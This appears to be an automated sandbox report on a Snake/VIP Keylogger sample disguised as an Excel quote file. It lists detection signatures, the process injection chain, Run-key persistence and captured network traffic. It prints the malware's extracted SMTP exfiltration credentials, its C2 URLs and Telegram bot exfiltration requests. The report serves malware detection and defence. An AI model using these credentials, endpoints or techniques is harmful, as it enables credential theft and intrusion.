Windows Analysis Report
TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Overview

General Information

Sample name: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
renamed because original name is a hash value
Original sample name: TEKLF TALEP VE FYAT TEKLF_xlsx.exe
Analysis ID: 1528904
MD5: 1e9dc5041bf503cb63397e6a8f0bae9a
SHA1: 9d21fe92ee433be3be4c09f8d242b4ad87d2158c
SHA256: e918f19d7627b7fa623f669351f2e00e029fa71bf08082c527da5b88ec53b9dc
Tags: exe, MassLogger, user-lowmal3

Detection

MassLogger RAT, Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected MassLogger RAT
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Tojeiuai.exe (PID: 7104 cmdline: "C:\Users\user\AppData\Roaming\Tojeiuai.exe" MD5: 1E9DC5041BF503CB63397E6A8F0BAE9A)
    • InstallUtil.exe (PID: 5480 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • Tojeiuai.exe (PID: 7104 cmdline: "C:\Users\user\AppData\Roaming\Tojeiuai.exe" MD5: 1E9DC5041BF503CB63397E6A8F0BAE9A)
    • InstallUtil.exe (PID: 3772 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "royallog@tonicables.top", "Password": "7213575aceACE@@ ", "Host": "mail.tonicables.top", "Port": "587", "Version": "4.4"}
{"Exfil Mode": "SMTP", "Username": "royallog@tonicables.top", "Password": "7213575aceACE@@ ", "Host": "mail.tonicables.top", "Port": "587", "Version": "4.4"}
Source | Rule | Description | Author | Strings
00000006.00000002.2251979049.0000000002799000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000006.00000002.2251979049.0000000002AC7000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security |
00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |

Source | Rule | Description | Author | Strings
0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.5a40000.10.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
7.2.InstallUtil.exe.400000.0.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security |
7.2.InstallUtil.exe.400000.0.unpack | INDICATOR_SUSPICIOUS_EXE_DotNetProcHook | Detects executables with potential process hoocking | ditekSHen | 0x2f064:$s1: UnHook; 0x2f06b:$s2: SetHook; 0x2f073:$s3: CallNextHook; 0x2f080:$s4: _hook
3.2.Tojeiuai.exe.43e7d70.8.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
3.2.Tojeiuai.exe.43e7d70.8.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security |

System Summary

Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Tojeiuai.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, ProcessId: 6544, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Tojeiuai

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-08T12:45:00.369709+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49706 | 188.114.97.3 | 443 | TCP
2024-10-08T12:45:15.932731+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49722 | 188.114.97.3 | 443 | TCP
2024-10-08T12:45:22.339580+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49754 | 188.114.97.3 | 443 | TCP
2024-10-08T12:45:22.339649+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49755 | 188.114.97.3 | 443 | TCP
2024-10-08T12:45:23.461464+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49769 | 188.114.97.3 | 443 | TCP
2024-10-08T12:45:23.570189+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49770 | 188.114.97.3 | 443 | TCP
2024-10-08T12:45:23.638700+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49771 | 188.114.97.3 | 443 | TCP
2024-10-08T12:45:25.727929+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49785 | 188.114.97.3 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-08T12:44:58.764930+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49704 | 158.101.44.242 | 80 | TCP
2024-10-08T12:44:59.780550+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49704 | 158.101.44.242 | 80 | TCP
2024-10-08T12:45:05.718074+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49707 | 158.101.44.242 | 80 | TCP
2024-10-08T12:45:14.405600+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49710 | 158.101.44.242 | 80 | TCP
2024-10-08T12:45:15.358712+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49710 | 158.101.44.242 | 80 | TCP
2024-10-08T12:45:16.561818+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49729 | 158.101.44.242 | 80 | TCP
2024-10-08T12:45:18.218098+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49738 | 158.101.44.242 | 80 | TCP
2024-10-08T12:45:20.936823+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49746 | 158.101.44.242 | 80 | TCP
2024-10-08T12:45:22.833988+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49746 | 158.101.44.242 | 80 | TCP
2024-10-08T12:45:24.077496+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49776 | 158.101.44.242 | 80 | TCP

AV Detection

Source: 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "royallog@tonicables.top", "Password": "7213575aceACE@@ ", "Host": "mail.tonicables.top", "Port": "587", "Version": "4.4"}
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.raw.unpack, Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "royallog@tonicables.top", "Password": "7213575aceACE@@ ", "Host": "mail.tonicables.top", "Port": "587", "Version": "4.4"}
Source: http://anotherarmy.dns.army:8081, Virustotal: Detection: 17%
Source: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded, Virustotal: Detection: 7%
Source: http://aborters.duckdns.org:8081, Virustotal: Detection: 13%
Source: http://varders.kozow.com:8081, Virustotal: Detection: 14%
Source: C:\Users\user\AppData\Roaming\Tojeiuai.exe, ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Roaming\Tojeiuai.exe, Virustotal: Detection: 42%
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, ReversingLabs: Detection: 34%
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, Virustotal: Detection: 42%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\Tojeiuai.exe, Joe Sandbox ML: detected
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, Joe Sandbox ML: detected

Location Tracking

Source: unknown, DNS query: name: reallyfreegeoip.org
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49719 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49756 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49778 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49811 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49853 version: TLS 1.2
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2063013281.0000000005B60000.00000004.08000000.00040000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2043823101.0000000003557000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2164548814.0000000003714000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.0000000004594000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2251979049.0000000002A40000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2272906135.0000000003787000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2063013281.0000000005B60000.00000004.08000000.00040000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2043823101.0000000003557000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2164548814.0000000003714000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.0000000004594000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2251979049.0000000002A40000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2272906135.0000000003787000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2061637141.00000000057F0000.00000004.08000000.00040000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2061637141.00000000057F0000.00000004.08000000.00040000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp

Networking

Source: unknown, DNS query: name: api.telegram.org
Source: Yara match, File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438e6a0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.Tojeiuai.exe.43e7d70.8.raw.unpack, type: UNPACKEDPE
Source: global traffic, HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1, Host: reallyfreegeoip.org, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1, Host: reallyfreegeoip.org
Source: global traffic, HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965969%0D%0ADate%20and%20Time:%2009/10/2024%20/%2013:20:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965969%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1, Host: api.telegram.org, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965969%0D%0ADate%20and%20Time:%2008/10/2024%20/%2022:25:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965969%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1, Host: api.telegram.org, Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965969%0D%0ADate%20and%20Time:%2008/10/2024%20/%2019:29:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965969%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                    Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
                    Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49738 -> 158.101.44.242:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49729 -> 158.101.44.242:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49707 -> 158.101.44.242:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 158.101.44.242:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49776 -> 158.101.44.242:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49710 -> 158.101.44.242:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49746 -> 158.101.44.242:80
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49754 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49706 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49769 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49770 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49771 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49755 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49722 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49785 -> 188.114.97.3:443
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49719 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49756 version: TLS 1.0
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 08 Oct 2024 10:45:24 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 08 Oct 2024 10:45:29 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 08 Oct 2024 10:45:34 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.000000000446B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4490658108.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2272906135.000000000380B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4490634067.0000000000431000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496377708.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.000000000446B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2272906135.000000000380B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4490634067.0000000000431000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496377708.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.000000000446B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2272906135.000000000380B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                    Source: InstallUtil.exe, 00000002.00000002.4496377708.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                    Source: InstallUtil.exe, 00000002.00000002.4496377708.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.000000000446B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4490658108.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2272906135.000000000380B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2043823101.0000000003557000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2043823101.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496377708.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2164548814.0000000003714000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2251979049.0000000002A40000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4490634067.0000000000431000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496377708.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.000000000446B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2272906135.000000000380B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
